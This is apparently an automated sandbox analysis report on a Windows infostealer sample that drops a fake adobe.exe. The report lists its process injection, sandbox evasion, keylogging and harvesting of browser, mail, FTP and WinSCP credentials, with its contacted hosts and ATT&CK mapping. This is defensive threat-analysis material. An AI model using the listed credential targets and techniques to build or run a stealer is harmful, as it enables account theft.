                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597123Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594686Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594578Jump to behavior
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4034617232.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1783581463.000000000126C000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4034399772.0000000000EF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeMemory written: C:\Users\user\Desktop\ukBQ4ch2nE.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLReq
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $eq8<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}THjq
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $eq9<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}rTHjq
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 01/24/2025 23:57:06<br>User Name: user<br>Computer Name: 436432<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}r</html>
                    Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $eq3<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Users\user\Desktop\ukBQ4ch2nE.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Users\user\Desktop\ukBQ4ch2nE.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder
                    112
                    Process Injection
                    2
                    Obfuscated Files or Information
                    11
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    1
                    Software Packing
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Timestomp
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model11
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588356 Sample: ukBQ4ch2nE.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 27 s4.serv00.com 2->27 29 api.ipify.org 2->29 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 7 other signatures 2->55 7 ukBQ4ch2nE.exe 2 2->7         started        10 adobe.exe 2 2->10         started        12 adobe.exe 2 2->12         started        signatures3 process4 signatures5 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->57 59 Injects a PE file into a foreign processes 7->59 14 ukBQ4ch2nE.exe 16 4 7->14         started        61 Antivirus detection for dropped file 10->61 63 Multi AV Scanner detection for dropped file 10->63 65 Machine Learning detection for dropped file 10->65 19 adobe.exe 14 2 10->19         started        21 adobe.exe 2 12->21         started        process6 dnsIp7 31 s4.serv00.com 213.189.52.181, 21, 49712, 49713 ECO-ATMAN-PLECO-ATMAN-PL Poland 14->31 33 api.ipify.org 104.26.13.205, 443, 49711, 49717 CLOUDFLARENETUS United States 14->33 23 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 14->23 dropped 25 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 14->25 dropped 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->35 37 Tries to steal Mail credentials (via file / registry access) 14->37 39 Drops executable to a common third party application directory 14->39 41 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->41 43 Tries to harvest and steal ftp login credentials 21->43 45 Tries to harvest and steal browser information (history, passwords, etc) 21->45 47 Installs a global keyboard hook 21->47 file8 signatures9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    ukBQ4ch2nE.exe75%VirustotalBrowse
                    ukBQ4ch2nE.exe74%ReversingLabsWin32.Trojan.Leonem
                    ukBQ4ch2nE.exe100%AviraHEUR/AGEN.1306767
                    ukBQ4ch2nE.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%AviraHEUR/AGEN.1306767
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe74%ReversingLabsWin32.Trojan.Leonem
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://s4.serv00.com100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    104.26.13.205
                    truefalse
                      high
                      s4.serv00.com
                      213.189.52.181
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              high
